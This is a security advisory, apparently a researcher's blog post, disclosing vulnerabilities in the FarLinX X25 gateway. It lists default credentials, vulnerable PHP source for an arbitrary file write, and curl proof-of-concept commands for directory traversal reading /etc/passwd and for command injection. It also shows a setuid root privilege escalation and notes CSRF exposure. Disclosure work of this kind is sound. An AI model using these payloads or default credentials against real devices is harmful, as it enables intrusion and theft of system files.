JAHx164 - FarLinX X25 gateway multiple vulnerabilities
These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen.
About
The FarLinX X25 Gateway is the answer for handling all your X.25 to TCP/IP migration requirements. Featuring routing between TCP and X.25, TCP and XOT, X.25 and XOT, data conversion, a Triple-X PAD, Host PAD, an extension for special POS protocols and even an X.25 switch all at a very affordable cost, the FarLinX X25 Gateway fits the bill for TCP/IP to X.25 interconnection. -- http://www.farsite.com/
Fixed username allows easier bruteforcing
The device has a default login of "admin" with the password "farlinx" and while it does allow the password to be changed the username is hardcoded in the device Apache configuration and cannot be changed.
CVE-2014-7175 - Arbitrary write
The file 'fsSaveUIPersistence.php' will write user supplied data to the file 'fsUI.xyz' with minimal changes. This can be used to place attacker controlled code on the file system. This can easily be identifiedby examining the file source:
<?php
//Receive data from client
$strReceivedata = $_REQUEST['strSubmitData'];
//replace some chars
//$strReceivedata = preg_replace("/(\r\n|\n|\r)/", "\n", $strReceivedata);
//$strReceivedata = preg_replace("/\\\/", "", $strReceivedata);
//error_log($strReceivedata);
$pFile = fopen("fsUI.xyz", "w+");
if(fwrite($pFile, $strReceivedata) == false)
{
error_log("fail to save data to file");
}
fclose($pFile);
//error_log("Finished Running PHP");
?>
CVE-2014-7174 - Multiple directory traversal
There are several php scripts based around log handling that are vulnerable to directory traversal. The following examples are provided:
curl -u admin:farlinx -k -d 'viewFilesName=../../../../../../../../etc/passwd' https://host/sysZipTranLogFileShow.php
curl -u admin:farlinx -k -d 'savefileNames=../../../../../etc/passwd' https://host/sysSaveEventLog.php
curl -u admin:farlinx -k -d 'saveFilesName=../../../../../etc/passwd' https://host/sysSaveTransacLog.php
curl -u admin:farlinx -k -d 'zipfileName=../../../../../etc/passwd' https://host/sysZipLogFileShow.php
CVE-2014-7173 - Command injection
Several command injection vulnerabilities were identified in the following scripts: sysSaveMonitorData.php, fsx25MonProxy.php, syseditdate.php, iframeupload.php and sysRestoreX25Cplt.php. The following example is provided:
curl -u admin:farlinx 'http://host/fsx25MonProxy.php?strSubmitData=start+|ifconfig'
Privilege escalation
The file /http/bin/execCmd is a setuid binary that takes a command to run with elevated privileges as a command line argument. The following example shows this in effect:
$ id
uid=99(nobody) gid=101(nobody) groups=101(nobody)
$ /http/bin/execCmd id
uid=0(root) gid=101(nobody) groups=101(nobody)
Cross Site Request Forgery
Almost everyone of the urls provided in this advisory are exploitable through CSRF. No CSRF specific proof of concept is provided beyond the urls listed above.
Posted by Eldar Marcussen | Permanent link | File under: security, exploit, bug, advisory, vulnerability, disclosure